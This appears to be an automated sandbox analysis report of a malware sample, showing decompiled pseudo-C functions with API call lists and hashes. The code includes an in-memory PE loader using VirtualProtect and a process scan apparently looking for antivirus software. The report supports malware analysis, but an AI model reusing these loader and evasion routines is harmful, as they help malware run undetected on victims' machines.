                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                    • Opcode ID: 933df018434184c391b29fc3720955c9d13becfa63939842ccbd5951202d3440
                                                                                                                                                                                                    • Instruction ID: 237d2766e8479fcb689855b0b25c049ae587407ce0584283951909929b3c5c6b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 933df018434184c391b29fc3720955c9d13becfa63939842ccbd5951202d3440
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EBB01231200104FBDA015B00FD08F05BB21EB50700F038010F29084078C3354C20EB25
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                    			E00401E8D(void* __eax) {
                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                    				intOrPtr _t37;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t34 = __eax;
                                                                                                                                                                                                    				_t17 = E004018E1( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
                                                                                                                                                                                                    				if(_t17 != 0) {
                                                                                                                                                                                                    					_t28 = 8;
                                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t33 = _v8;
                                                                                                                                                                                                    					_t28 = E00401854( &_v8, _t33, _t34);
                                                                                                                                                                                                    					if(_t28 == 0) {
                                                                                                                                                                                                    						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                                                                                                                                                                                                    						_t28 = E004010DC(_t33, _t37);
                                                                                                                                                                                                    						if(_t28 == 0) {
                                                                                                                                                                                                    							_t25 = E004015BC(_t37, _t33); // executed
                                                                                                                                                                                                    							_t28 = _t25;
                                                                                                                                                                                                    							if(_t28 == 0) {
                                                                                                                                                                                                    								_push(_t25);
                                                                                                                                                                                                    								_push(1);
                                                                                                                                                                                                    								_push(_t33);
                                                                                                                                                                                                    								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
                                                                                                                                                                                                    									_t28 = GetLastError();
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t35 = _v12;
                                                                                                                                                                                                    					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
                                                                                                                                                                                                    					E00401E78(_t35);
                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                    					return _t28;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x00401e95
                                                                                                                                                                                                    0x00401eb2
                                                                                                                                                                                                    0x00401eb9
                                                                                                                                                                                                    0x00401f18
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00401ebb
                                                                                                                                                                                                    0x00401ebb
                                                                                                                                                                                                    0x00401ec5
                                                                                                                                                                                                    0x00401ec9
                                                                                                                                                                                                    0x00401ece
                                                                                                                                                                                                    0x00401ed7
                                                                                                                                                                                                    0x00401edb
                                                                                                                                                                                                    0x00401ee0
                                                                                                                                                                                                    0x00401ee5
                                                                                                                                                                                                    0x00401ee9
                                                                                                                                                                                                    0x00401eee
                                                                                                                                                                                                    0x00401eef
                                                                                                                                                                                                    0x00401ef3
                                                                                                                                                                                                    0x00401ef8
                                                                                                                                                                                                    0x00401f00
                                                                                                                                                                                                    0x00401f00
                                                                                                                                                                                                    0x00401ef8
                                                                                                                                                                                                    0x00401ee9
                                                                                                                                                                                                    0x00401edb
                                                                                                                                                                                                    0x00401f02
                                                                                                                                                                                                    0x00401f0b
                                                                                                                                                                                                    0x00401f0f
                                                                                                                                                                                                    0x00401f19
                                                                                                                                                                                                    0x00401f1f
                                                                                                                                                                                                    0x00401f1f

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 004018E1: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00401EB7,?,?,?,?,00000002,?,?), ref: 00401906
                                                                                                                                                                                                      • Part of subcall function 004018E1: GetProcAddress.KERNEL32(00000000,?), ref: 00401928
                                                                                                                                                                                                      • Part of subcall function 004018E1: GetProcAddress.KERNEL32(00000000,?), ref: 0040193E
                                                                                                                                                                                                      • Part of subcall function 004018E1: GetProcAddress.KERNEL32(00000000,?), ref: 00401954
                                                                                                                                                                                                      • Part of subcall function 004018E1: GetProcAddress.KERNEL32(00000000,?), ref: 0040196A
                                                                                                                                                                                                      • Part of subcall function 004018E1: GetProcAddress.KERNEL32(00000000,?), ref: 00401980
                                                                                                                                                                                                      • Part of subcall function 00401854: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,00401EC5,?,?,?,?,?,?,00000002), ref: 0040188B
                                                                                                                                                                                                      • Part of subcall function 00401854: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 004018C0
                                                                                                                                                                                                      • Part of subcall function 004010DC: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000002), ref: 00401112
                                                                                                                                                                                                      • Part of subcall function 004010DC: lstrlenA.KERNEL32(?), ref: 00401128
                                                                                                                                                                                                      • Part of subcall function 004010DC: memset.NTDLL ref: 00401132
                                                                                                                                                                                                      • Part of subcall function 004010DC: GetProcAddress.KERNEL32(?,00000002), ref: 00401195
                                                                                                                                                                                                      • Part of subcall function 004010DC: lstrlenA.KERNEL32(-00000002), ref: 004011AA
                                                                                                                                                                                                      • Part of subcall function 004010DC: memset.NTDLL ref: 004011B4
                                                                                                                                                                                                      • Part of subcall function 004015BC: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 004015EA
                                                                                                                                                                                                      • Part of subcall function 004015BC: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 00401642
                                                                                                                                                                                                      • Part of subcall function 004015BC: GetLastError.KERNEL32 ref: 00401648
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 00401EFA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 33504255-0
                                                                                                                                                                                                    • Opcode ID: 3a7c5fec7fd59f96d7fc7581a02ed19964e5ac299e5c73565c87b7b30316a726
                                                                                                                                                                                                    • Instruction ID: cd1b2d48d4b059c34e3f9a3c3f2000d3f9864e942450b6c95fd62b501f8a06d9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a7c5fec7fd59f96d7fc7581a02ed19964e5ac299e5c73565c87b7b30316a726
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C11AC776007126BD72167A58C85DAB77ACAF54318B00013EFA05F7391E7B8ED0587A8
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                    			E04F63402(void* __ecx, signed char* _a4) {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				signed short _t11;
                                                                                                                                                                                                    				signed int _t12;
                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    				signed short* _t22;
                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                    				intOrPtr* _t27;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t24 = 0;
                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                    				_t19 = 1;
                                                                                                                                                                                                    				_t27 = 0x4f6d330;
                                                                                                                                                                                                    				E04F694FB();
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_t8 = E04F6523C(_a4,  &_v8); // executed
                                                                                                                                                                                                    					if(_t8 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_push(_v8);
                                                                                                                                                                                                    					_t14 = 0xd;
                                                                                                                                                                                                    					_t15 = E04F6978C(_t14);
                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                    						HeapFree( *0x4f6d238, 0, _v8);
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						 *_t27 = _t15;
                                                                                                                                                                                                    						_t27 = _t27 + 4;
                                                                                                                                                                                                    						_t24 = _t24 + 1;
                                                                                                                                                                                                    						if(_t24 < 3) {
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					_push(1);
                                                                                                                                                                                                    					E04F694FB();
                                                                                                                                                                                                    					if(_t19 != 0) {
                                                                                                                                                                                                    						_t22 =  *0x4f6d338; // 0x5929b58
                                                                                                                                                                                                    						_t11 =  *_t22 & 0x0000ffff;
                                                                                                                                                                                                    						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                                                                                                                                                                    							_t12 = _t11 & 0x0000ffff;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *_t22 = _t12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					return _t19;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t19 = 0;
                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x04f6340a
                                                                                                                                                                                                    0x04f6340e
                                                                                                                                                                                                    0x04f6340f
                                                                                                                                                                                                    0x04f63410
                                                                                                                                                                                                    0x04f63415
                                                                                                                                                                                                    0x04f6341a
                                                                                                                                                                                                    0x04f63421
                                                                                                                                                                                                    0x04f63428
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6342a
                                                                                                                                                                                                    0x04f6342f
                                                                                                                                                                                                    0x04f63430
                                                                                                                                                                                                    0x04f63437
                                                                                                                                                                                                    0x04f63451
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f63439
                                                                                                                                                                                                    0x04f63439
                                                                                                                                                                                                    0x04f6343b
                                                                                                                                                                                                    0x04f6343e
                                                                                                                                                                                                    0x04f63442
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f63444
                                                                                                                                                                                                    0x04f63442
                                                                                                                                                                                                    0x04f63459
                                                                                                                                                                                                    0x04f63459
                                                                                                                                                                                                    0x04f6345b
                                                                                                                                                                                                    0x04f63462
                                                                                                                                                                                                    0x04f63464
                                                                                                                                                                                                    0x04f6346a
                                                                                                                                                                                                    0x04f63471
                                                                                                                                                                                                    0x04f63481
                                                                                                                                                                                                    0x04f63479
                                                                                                                                                                                                    0x04f6347c
                                                                                                                                                                                                    0x04f6347c
                                                                                                                                                                                                    0x04f63484
                                                                                                                                                                                                    0x04f63484
                                                                                                                                                                                                    0x04f6348d
                                                                                                                                                                                                    0x04f6348d
                                                                                                                                                                                                    0x04f63457
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 04F694FB: GetProcAddress.KERNEL32(36776F57,04F6341A), ref: 04F69516
                                                                                                                                                                                                      • Part of subcall function 04F6523C: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 04F65267
                                                                                                                                                                                                      • Part of subcall function 04F6523C: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 04F65289
                                                                                                                                                                                                      • Part of subcall function 04F6523C: memset.NTDLL ref: 04F652A3
                                                                                                                                                                                                      • Part of subcall function 04F6523C: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04F652E1
                                                                                                                                                                                                      • Part of subcall function 04F6523C: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04F652F5
                                                                                                                                                                                                      • Part of subcall function 04F6523C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 04F6530C
                                                                                                                                                                                                      • Part of subcall function 04F6523C: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04F65318
                                                                                                                                                                                                      • Part of subcall function 04F6523C: lstrcat.KERNEL32(?,642E2A5C), ref: 04F65359
                                                                                                                                                                                                      • Part of subcall function 04F6523C: FindFirstFileA.KERNELBASE(?,?), ref: 04F6536F
                                                                                                                                                                                                      • Part of subcall function 04F6978C: lstrlen.KERNEL32(?,00000000,04F6D330,00000001,04F63435,04F6D00C,04F6D00C,00000000,00000005,00000000,00000000,?,?,?,04F6568F,04F65073), ref: 04F69795
                                                                                                                                                                                                      • Part of subcall function 04F6978C: mbstowcs.NTDLL ref: 04F697BC
                                                                                                                                                                                                      • Part of subcall function 04F6978C: memset.NTDLL ref: 04F697CE
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,04F6D00C,04F6D00C,04F6D00C,00000000,00000005,00000000,00000000,?,?,?,04F6568F,04F65073,04F6D00C,?,04F65073), ref: 04F63451
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 983081259-0
                                                                                                                                                                                                    • Opcode ID: 15bf37cfec7096b489641851d1bf17dd3f63e833067f304f6b2e33a66eda9964
                                                                                                                                                                                                    • Instruction ID: f2ba21a97ea5cd5a74f034904f6ae9d9c3940b1516a1242066075e7f9cbb8879
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15bf37cfec7096b489641851d1bf17dd3f63e833067f304f6b2e33a66eda9964
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7012876B00254AAF7119EE6DC80F7BB698EB45768F40003AED86C6040D2B4FC839360
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E04F62AFE(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                                                                                    					_t15 = E04F65974(_a4, _a8, _a12, __edi); // executed
                                                                                                                                                                                                    					_t26 = _t15;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t26 = E04F663A4(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                                                                                                                                                                                    					if(_t26 == 0) {
                                                                                                                                                                                                    						_t23 = _a8 >> 1;
                                                                                                                                                                                                    						if(_t23 == 0) {
                                                                                                                                                                                                    							_t26 = 2;
                                                                                                                                                                                                    							HeapFree( *0x4f6d238, 0, _a12);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t21 = _a12;
                                                                                                                                                                                                    							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
                                                                                                                                                                                                    							 *__edi = _t21;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t26;
                                                                                                                                                                                                    			}







                                                                                                                                                                                                    0x04f62b06
                                                                                                                                                                                                    0x04f62b5d
                                                                                                                                                                                                    0x04f62b62
                                                                                                                                                                                                    0x04f62b08
                                                                                                                                                                                                    0x04f62b22
                                                                                                                                                                                                    0x04f62b26
                                                                                                                                                                                                    0x04f62b2b
                                                                                                                                                                                                    0x04f62b2d
                                                                                                                                                                                                    0x04f62b3f
                                                                                                                                                                                                    0x04f62b4b
                                                                                                                                                                                                    0x04f62b2f
                                                                                                                                                                                                    0x04f62b2f
                                                                                                                                                                                                    0x04f62b34
                                                                                                                                                                                                    0x04f62b39
                                                                                                                                                                                                    0x04f62b39
                                                                                                                                                                                                    0x04f62b2d
                                                                                                                                                                                                    0x04f62b26
                                                                                                                                                                                                    0x04f62b68

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,04F65CC9,?,004F0053,05929378,00000000,?), ref: 04F62B4B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                    • Opcode ID: 576d80d58bd01360ba22c780f4ac3f7defd660f955771c5cba476c1702c7e598
                                                                                                                                                                                                    • Instruction ID: 43cf4bb6722bec404419faefa6ae9787073b63de9ca231bae8e05dd33669979d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 576d80d58bd01360ba22c780f4ac3f7defd660f955771c5cba476c1702c7e598
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96018132500649FBDF22EF54DC01FAA3BB9FF04750F058159FA1A9A160D730A922EB80
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                    			E04F63651(intOrPtr* __edi) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                    				intOrPtr _t15;
                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t21 = __edi;
                                                                                                                                                                                                    				_push( &_v12);
                                                                                                                                                                                                    				_push(__edi);
                                                                                                                                                                                                    				_v8 = 0x1d4c0;
                                                                                                                                                                                                    				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					_v16 = _t15;
                                                                                                                                                                                                    					Sleep(0x1f4); // executed
                                                                                                                                                                                                    					if(_v12 == 4) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_v8 == 0) {
                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                    						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_v8 <= 0x1f4) {
                                                                                                                                                                                                    							_v16 = 0x80004004;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_v8 = _v8 - 0x1f4;
                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                    					return _v16;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x04f63651
                                                                                                                                                                                                    0x04f6365e
                                                                                                                                                                                                    0x04f6365f
                                                                                                                                                                                                    0x04f63660
                                                                                                                                                                                                    0x04f63667
                                                                                                                                                                                                    0x04f63695
                                                                                                                                                                                                    0x04f63696
                                                                                                                                                                                                    0x04f63699
                                                                                                                                                                                                    0x04f6369f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f6367e
                                                                                                                                                                                                    0x04f63688
                                                                                                                                                                                                    0x04f6368f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f63680
                                                                                                                                                                                                    0x04f63683
                                                                                                                                                                                                    0x04f636a3
                                                                                                                                                                                                    0x04f63685
                                                                                                                                                                                                    0x04f63685
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f63685
                                                                                                                                                                                                    0x04f63683
                                                                                                                                                                                                    0x04f636aa
                                                                                                                                                                                                    0x04f636b0
                                                                                                                                                                                                    0x04f636b0
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 04F63699
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                                    • Opcode ID: ce07cdc8ac5d4055488d075a3b33d5afed2b07a144b33d560bc324fcf217c6c7
                                                                                                                                                                                                    • Instruction ID: 0626f2dcb0ee9cc8173001bfbbf02d36a160999bcd296260ae1b19c1246a8a40
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce07cdc8ac5d4055488d075a3b33d5afed2b07a144b33d560bc324fcf217c6c7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4F0EC76D01219EFDB00DB94D988EEDB7B8EF08305F1080AAE912A7241D3B56B85DF55
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E04F6315A(void* __edx, void* __edi, void* _a4) {
                                                                                                                                                                                                    				int _t7;
                                                                                                                                                                                                    				int _t13;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t7 = E04F669C1(__edx, __edi, _a4,  &_a4); // executed
                                                                                                                                                                                                    				_t13 = _t7;
                                                                                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                                                                                    					memcpy(__edi, _a4, _t13);
                                                                                                                                                                                                    					 *((char*)(__edi + _t13)) = 0;
                                                                                                                                                                                                    					E04F6677C(_a4);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x04f63166
                                                                                                                                                                                                    0x04f6316b
                                                                                                                                                                                                    0x04f6316f
                                                                                                                                                                                                    0x04f63176
                                                                                                                                                                                                    0x04f63181
                                                                                                                                                                                                    0x04f63185
                                                                                                                                                                                                    0x04f63185
                                                                                                                                                                                                    0x04f6318e

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 04F669C1: memcpy.NTDLL(00000000,00000090,00000002,00000002,04F628D0,00000008,04F628D0,04F628D0,?,04F694B3,04F628D0), ref: 04F669F7
                                                                                                                                                                                                      • Part of subcall function 04F669C1: memset.NTDLL ref: 04F66A6C
                                                                                                                                                                                                      • Part of subcall function 04F669C1: memset.NTDLL ref: 04F66A80
                                                                                                                                                                                                    • memcpy.NTDLL(00000002,04F628D0,00000000,00000002,04F628D0,04F628D0,04F628D0,?,04F694B3,04F628D0,?,04F628D0,00000002,?,?,04F650A1), ref: 04F63176
                                                                                                                                                                                                      • Part of subcall function 04F6677C: HeapFree.KERNEL32(00000000,00000000,04F69161,00000000,?,?,00000000), ref: 04F66788
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: memcpymemset$FreeHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3053036209-0
                                                                                                                                                                                                    • Opcode ID: 19ede30670193b995c5d5db20b1a4b6792fa3a521838883ea8051f015e3fd0f2
                                                                                                                                                                                                    • Instruction ID: 49910236e0d25bfde396e2bcc0449edd280529129efcd52a15ae6a7a781ebf3a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19ede30670193b995c5d5db20b1a4b6792fa3a521838883ea8051f015e3fd0f2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3EE0CD7740011877D7122A94DC00EEF7F6CDF556D5F004014FE0986110D632E51197F5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                    			E04F6244A() {
                                                                                                                                                                                                    				char _v264;
                                                                                                                                                                                                    				void* _v300;
                                                                                                                                                                                                    				int _t8;
                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                    				int _t15;
                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t15 = 0;
                                                                                                                                                                                                    				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                    				if(_t17 != 0) {
                                                                                                                                                                                                    					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                                                                                    					while(_t8 != 0) {
                                                                                                                                                                                                    						_t9 =  *0x4f6d2a4; // 0x9ba5a8
                                                                                                                                                                                                    						_t2 = _t9 + 0x4f6ee48; // 0x73617661
                                                                                                                                                                                                    						_push( &_v264);
                                                                                                                                                                                                    						if( *0x4f6d0fc() != 0) {
                                                                                                                                                                                                    							_t15 = 1;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                    						CloseHandle(_t17);
                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L8:
                                                                                                                                                                                                    				return _t15;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x04f62455
                                                                                                                                                                                                    0x04f6245f
                                                                                                                                                                                                    0x04f62463
                                                                                                                                                                                                    0x04f6246d
                                                                                                                                                                                                    0x04f6249e
                                                                                                                                                                                                    0x04f62474
                                                                                                                                                                                                    0x04f62479
                                                                                                                                                                                                    0x04f62486
                                                                                                                                                                                                    0x04f6248f
                                                                                                                                                                                                    0x04f624a6
                                                                                                                                                                                                    0x04f62491
                                                                                                                                                                                                    0x04f62499
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f62499
                                                                                                                                                                                                    0x04f624a7
                                                                                                                                                                                                    0x04f624a8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f624a8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x04f624a2
                                                                                                                                                                                                    0x04f624ae
                                                                                                                                                                                                    0x04f624b3

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04F6245A
                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 04F6246D
                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,?), ref: 04F62499
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04F624A8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
